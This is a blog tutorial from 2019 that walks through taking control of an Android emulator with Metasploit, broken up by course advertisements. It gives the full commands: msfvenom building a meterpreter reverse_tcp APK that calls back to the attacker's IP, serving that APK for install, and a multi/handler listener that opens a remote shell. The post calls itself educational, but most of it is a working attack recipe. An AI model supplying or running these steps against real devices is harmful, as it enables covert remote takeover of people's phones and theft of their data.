Hacking Android With Metasploit

Good morning/evening/night my fellow hackers, today’s lesson is on Metasploit and how we can hack Android with a Metasploit payload. So let’s get started!!

As always, this post is for educational purposes and should not be used on your friends or enemies, that’s illegal.

Firstly we are using an Android emulator for this class. You can download the APK yourself from here and try this cool hack.

$199 ENROLLS YOU INTO OUR SELF PACED COURSE – LFS264 – OPNFV FUNDAMENTALS!

Once you have that set up, we then need an attacking machine with Metasploit built in, Kali Linux is our go-to attacking machine.

Next we will generate our android payload and make it into an APK so that it is executable, so open up a shell and on the command line type

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.139 LPORT=4444 R > androidhack.apk

In the command above we are asking the tool msfvenom to use the payload of reverse TCP, use our attacking IP as the LHOST and 4444 as the LPORT we will use to listen on.

Your IP may differ from ours, you can check with the ifconfig command.

Before we do anything with our new file, we will need to give it permissions to be able to execute, type

chmod 755 androidhack.apk

Once you enter that command the color of the file should turn green.

ENROLL TODAY IN THE SELF PACED COURSE – LFS263 – ONAP FUNDAMENTALS FOR $199!

That’s the payload generated as an APK file that can be installed by any Android device. Next we will need to infect the device.

So let’s install the APK on the Android emulator.

To do that we just need to visit our attacking machine IP, so open a browser on the device and go to 192.168.1.139.

apk1

Let’s click on the file and install it on the device, once the app is installed you will be informed, but don’t open it just yet.

apk2

Now we need to generate an exploit on our attacking machine, we will do this with Metasploit. So open up a new tab or shell and type msfconsole.

apk3

Once the Metasploit console is open we can now generate the exploit. On the command line type

use exploit/multi/handler

apk4

 

Next we need to set the payload for a reverse TCP connection with the app on the Android device. Type

set PAYLOAD android/meterpreter/reverse_TCP

$299 REGISTERS YOU FOR OUR NEWEST SELF PACED COURSE! LFD201 – INTRODUCTION TO OPEN SOURCE DEVELOPMENT, GIT, AND LINUX!

Perfect, now we set up our attacking machines IP as the LHOST again, sotype

set LHOST 192.168.1.139

A show options command will tell us that everything is set up correctly.

apk6

All that’s left to do nonw is exploit! type

exploit

Now let’s open the APK file on the Android device, when we click on the Open button we should get a reverse TCP shell from the Android device to our meterpreter shell.

apk7

Beauty, it worked!! Just to confirm we can type the command sysinfo.

apk8

And as we can see we have managed to hack the device.

REGISTER TODAY FOR YOUR KUBERNETES FOR DEVELOPERS (LFD259) COURSE AND CKAD CERTIFICATION TODAY! $499!    $299 now!!

Thanks so much for reading to the end, please feel free to like, share or comment.

And don’t forget to subscribe to get more free tutorials like this one.

QuBits 2019-09-04

LFD432

 

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.